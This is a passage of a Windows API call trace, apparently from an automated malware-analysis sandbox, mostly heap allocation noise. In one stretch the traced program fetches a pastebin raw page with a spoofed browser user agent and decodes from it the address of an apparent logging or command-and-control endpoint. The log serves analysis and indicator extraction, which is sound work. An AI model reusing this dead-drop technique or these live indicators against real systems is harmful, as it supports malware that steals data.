[2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x8bf298 | out: ppvObject=0x8bf298*=0x0) returned 0x80004002 [0246.597] WinHttpRequest:IUnknown:QueryInterface (in: This=0xc26c30, riid=0x322c4c*(Data1=0x10a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8bf298 | out: ppvObject=0x8bf298*=0x0) returned 0x80004002 [0246.597] WinHttpRequest:IUnknown:QueryInterface (in: This=0xc26c30, riid=0x322c0c*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xc1b128 | out: ppvObject=0xc1b128*=0xc26c30) returned 0x0 [0246.597] WinHttpRequest:IUnknown:Release (This=0xc26c30) returned 0x1 [0246.597] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f28 [0246.597] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f40 [0246.597] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f40 | out: hHeap=0xbe0000) returned 1 [0246.597] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9af0 | out: hHeap=0xbe0000) returned 1 [0246.597] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9b50 | out: hHeap=0xbe0000) returned 1 [0246.597] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e258 | out: hHeap=0xbe0000) returned 1 [0246.598] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21968 | out: hHeap=0xbe0000) returned 1 [0246.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e258 [0246.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b50 [0246.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21968 [0246.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9af0 [0246.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f40 [0246.598] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9f28 | out: hHeap=0xbe0000) returned 1 [0246.598] PeekMessageW (in: lpMsg=0x8bf6ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf6ac) returned 0 [0246.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc218c8 [0246.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f28 [0246.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc219a8 [0246.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f58 [0246.598] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc219c8 [0246.598] RtlSizeHeap (HeapHandle=0xbe0000, Flags=0x0, MemoryPointer=0xc03138) returned 0x80 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e488 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcf9f70 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9f88 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcf9fa0 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcf9fb8 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9fd0 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcf9fe8 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfa000 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfa018 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfa030 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfa048 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21998 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa060 [0246.599] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21998 | out: hHeap=0xbe0000) returned 1 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e4b0 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa078 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa090 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21998 [0246.599] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa060 | out: hHeap=0xbe0000) returned 1 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc219b8 [0246.599] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e4d8 [0246.599] CharUpperBuffW (in: lpsz="PASTEBIN", cchLength=0x8 | out: lpsz="PASTEBIN") returned 0x8 [0246.600] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e4d8 | out: hHeap=0xbe0000) returned 1 [0246.600] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc219b8 | out: hHeap=0xbe0000) returned 1 [0246.600] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfa060 [0246.600] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xc1b318 [0246.600] PeekMessageW (in: lpMsg=0x8beddc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beddc) returned 0 [0246.600] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e4d8 [0246.600] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0a8 [0246.600] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc219b8 [0246.600] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0c0 [0246.600] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc219b8 | out: hHeap=0xbe0000) returned 1 [0246.600] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0d8 [0246.600] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0c0 | out: hHeap=0xbe0000) returned 1 [0246.600] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0a8 | out: hHeap=0xbe0000) returned 1 [0246.600] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e4d8 | out: hHeap=0xbe0000) returned 1 [0246.600] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xbf33f0 | out: hHeap=0xbe0000) returned 1 [0246.600] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc050e0 | out: hHeap=0xbe0000) returned 1 [0246.600] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0d8 | out: hHeap=0xbe0000) returned 1 [0246.600] PeekMessageW (in: lpMsg=0x8beddc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beddc) returned 0 [0246.600] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc050e0 [0246.600] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0d8 [0246.600] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc050e0 | out: hHeap=0xbe0000) returned 1 [0246.600] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e4d8 [0246.600] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0a8 [0246.600] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc050e0 [0246.600] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0c0 [0246.600] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0f0 [0246.601] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0d8 | out: hHeap=0xbe0000) returned 1 [0246.601] PeekMessageW (in: lpMsg=0x8beddc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beddc) returned 0 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc219b8 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e500 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0d8 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc219d8 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e528 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa108 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc219e8 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa120 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc219f8 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xc4d3d8 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa138 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a08 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x50) returned 0xc63938 [0246.601] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa138 | out: hHeap=0xbe0000) returned 1 [0246.601] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc4d3d8 | out: hHeap=0xbe0000) returned 1 [0246.601] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc219f8 | out: hHeap=0xbe0000) returned 1 [0246.601] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc219e8 | out: hHeap=0xbe0000) returned 1 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x50) returned 0xc639e8 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc219e8 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa138 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc219f8 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa150 [0246.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a18 [0246.602] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa168 [0246.602] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a28 [0246.602] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa180 [0246.602] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a38 [0246.602] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa198 [0246.602] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a48 [0246.602] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa1b0 [0246.602] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a58 [0246.602] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa1c8 [0246.602] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a68 [0246.602] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa1e0 [0246.602] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a78 [0246.602] InternetCrackUrlW (in: lpszUrl="http://pastebin.com/raw.php?i=7MDswaSn", dwUrlLength=0x26, dwFlags=0x0, lpUrlComponents=0x8be728 | out: lpUrlComponents=0x8be728) returned 1 [0246.835] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa168 | out: hHeap=0xbe0000) returned 1 [0246.835] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1f1f8 [0246.835] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa1b0 | out: hHeap=0xbe0000) returned 1 [0246.835] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1f248 [0246.835] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa1c8 | out: hHeap=0xbe0000) returned 1 [0246.835] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1f270 [0246.835] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x28) returned 0xc1c480 [0246.835] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21c68 [0246.835] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa1e0 | out: hHeap=0xbe0000) returned 1 [0246.835] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xc29090 [0246.835] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1c480 | out: hHeap=0xbe0000) returned 1 [0246.835] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21c68 | out: hHeap=0xbe0000) returned 1 [0246.835] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0246.836] InternetSetOptionW (hInternet=0x0, dwOption=0x32, lpBuffer=0x8be770, dwBufferLength=0x8) returned 1 [0246.837] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0x0, lpdwBufferLength=0x8be77c | out: lpBuffer=0x0, lpdwBufferLength=0x8be77c) returned 0 [0246.972] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xcfaa38 [0246.972] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x26, lpBuffer=0xcfaa38, lpdwBufferLength=0x8be77c | out: lpBuffer=0xcfaa38, lpdwBufferLength=0x8be77c) returned 1 [0246.973] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfaa38 | out: hHeap=0xbe0000) returned 1 [0246.973] InternetConnectW (hInternet=0xcc0004, lpszServerName="pastebin.com", nServerPort=0x50, lpszUserName="", lpszPassword="", dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0246.973] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="/raw.php?i=7MDswaSn", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0246.975] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0247.897] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x8be730, lpdwBufferLength=0x8be728, lpdwIndex=0x8be72c*=0x0 | out: lpBuffer=0x8be730*, lpdwBufferLength=0x8be728*=0x4, lpdwIndex=0x8be72c*=0x0) returned 1 [0247.897] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x5, lpBuffer=0x8be74c, lpdwBufferLength=0x8be778, lpdwIndex=0x8be77c*=0x0 | out: lpBuffer=0x8be74c, lpdwBufferLength=0x8be778, lpdwIndex=0x8be77c*=0x0) returned 0 [0247.897] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x8be6b0 | out: lpCharType=0x8be6b0) returned 1 [0247.897] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x8be72c, dwFlags=0x0, dwContext=0x0) returned 1 [0247.897] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x2b) returned 0xe57758 [0247.897] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xe57758, dwNumberOfBytesToRead=0x2b, lpdwNumberOfBytesRead=0x8be730 | out: lpBuffer=0xe57758*, lpdwNumberOfBytesRead=0x8be730*=0x2b) returned 1 [0247.897] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe02dc8 [0247.897] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xda4fa8 [0247.897] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x2b) returned 0xe57790 [0247.897] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xe57790, dwNumberOfBytesToRead=0x2b, lpdwNumberOfBytesRead=0x8be730 | out: lpBuffer=0xe57790*, lpdwNumberOfBytesRead=0x8be730*=0x0) returned 1 [0247.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe57790 | out: hHeap=0xbe0000) returned 1 [0247.898] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0247.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc29090 | out: hHeap=0xbe0000) returned 1 [0247.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a78 | out: hHeap=0xbe0000) returned 1 [0247.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1f270 | out: hHeap=0xbe0000) returned 1 [0247.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a68 | out: hHeap=0xbe0000) returned 1 [0247.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1f248 | out: hHeap=0xbe0000) returned 1 [0247.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a58 | out: hHeap=0xbe0000) returned 1 [0247.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa198 | out: hHeap=0xbe0000) returned 1 [0247.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a48 | out: hHeap=0xbe0000) returned 1 [0247.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa180 | out: hHeap=0xbe0000) returned 1 [0247.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a38 | out: hHeap=0xbe0000) returned 1 [0247.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1f1f8 | out: hHeap=0xbe0000) returned 1 [0247.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a28 | out: hHeap=0xbe0000) returned 1 [0247.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa150 | out: hHeap=0xbe0000) returned 1 [0247.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a18 | out: hHeap=0xbe0000) returned 1 [0247.898] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21a18 [0247.898] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x2b) returned 0xc29090 [0247.898] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0247.898] InternetCloseHandle (hInternet=0xcc0008) returned 0 [0247.898] CloseHandle (hObject=0x0) returned 0 [0247.898] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe57758 | out: hHeap=0xbe0000) returned 1 [0247.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xda4fa8 | out: hHeap=0xbe0000) returned 1 [0247.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe02dc8 | out: hHeap=0xbe0000) returned 1 [0247.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa138 | out: hHeap=0xbe0000) returned 1 [0247.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc219f8 | out: hHeap=0xbe0000) returned 1 [0247.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc639e8 | out: hHeap=0xbe0000) returned 1 [0247.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc219e8 | out: hHeap=0xbe0000) returned 1 [0247.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc63938 | out: hHeap=0xbe0000) returned 1 [0247.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a08 | out: hHeap=0xbe0000) returned 1 [0247.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa120 | out: hHeap=0xbe0000) returned 1 [0247.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa108 | out: hHeap=0xbe0000) returned 1 [0247.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e528 | out: hHeap=0xbe0000) returned 1 [0247.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc219d8 | out: hHeap=0xbe0000) returned 1 [0247.899] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x2c) returned 0xe57758 [0247.899] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc219d8 [0247.899] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x58) returned 0xdba810 [0247.899] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a08 [0247.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xe57758, cbMultiByte=44, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 44 [0247.899] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x58) returned 0xdba8d0 [0247.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xe57758, cbMultiByte=44, lpWideCharStr=0xdba8d0, cchWideChar=44 | out: lpWideCharStr="https://panicvolunteers.com/bgr/log/log.php") returned 44 [0247.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdba8d0 | out: hHeap=0xbe0000) returned 1 [0247.899] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa108 [0247.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe57758 | out: hHeap=0xbe0000) returned 1 [0247.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc219d8 | out: hHeap=0xbe0000) returned 1 [0247.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc29090 | out: hHeap=0xbe0000) returned 1 [0247.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a18 | out: hHeap=0xbe0000) returned 1 [0247.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa0d8 | out: hHeap=0xbe0000) returned 1 [0247.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e500 | out: hHeap=0xbe0000) returned 1 [0247.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc219b8 | out: hHeap=0xbe0000) returned 1 [0247.900] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xc1e500 [0247.900] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0d8 [0247.900] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc219b8 [0247.900] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa120 [0247.900] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa138 [0247.900] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa108 | out: hHeap=0xbe0000) returned 1 [0247.900] PeekMessageW (in: lpMsg=0x8beddc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beddc) returned 1 [0247.900] TranslateMessage (lpMsg=0x8beddc) returned 0 [0247.900] DispatchMessageW (lpMsg=0x8beddc) returned 0x0 [0247.900] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xc33560 [0247.900] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a18 [0247.900] Shell_NotifyIconW (dwMessage=0x1, lpData=0x8be478) returned 1 [0247.902] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc33560 | out: hHeap=0xbe0000) returned 1 [0247.902] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a18 | out: hHeap=0xbe0000) returned 1 [0247.902] KillTimer (hWnd=0x5014a, uIDEvent=0x1) returned 1 [0247.902] SetTimer (hWnd=0x5014a, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0247.902] PeekMessageW (in: lpMsg=0x8beddc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beddc) returned 0 [0247.902] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21a18 [0247.902] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc219d8 [0247.902] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20a) returned 0xc33560 [0247.902] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc219e8 [0247.902] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc33560 | out: hHeap=0xbe0000) returned 1 [0247.902] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc219e8 | out: hHeap=0xbe0000) returned 1 [0247.902] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc219d8 | out: hHeap=0xbe0000) returned 1 [0247.902] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a18 | out: hHeap=0xbe0000) returned 1 [0247.902] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x38) returned 0xc2cb10 [0247.902] PeekMessageW (in: lpMsg=0x8beddc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beddc) returned 0 [0247.902] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21a18 [0247.902] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa108 [0247.902] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21a18 | out: hHeap=0xbe0000) returned 1 [0247.902] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfaa08 [0247.902] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa108 | out: hHeap=0xbe0000) returned 1 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc2cb10 | out: hHeap=0xbe0000) returned 1 [0247.903] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa108 [0247.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfaa08 | out: 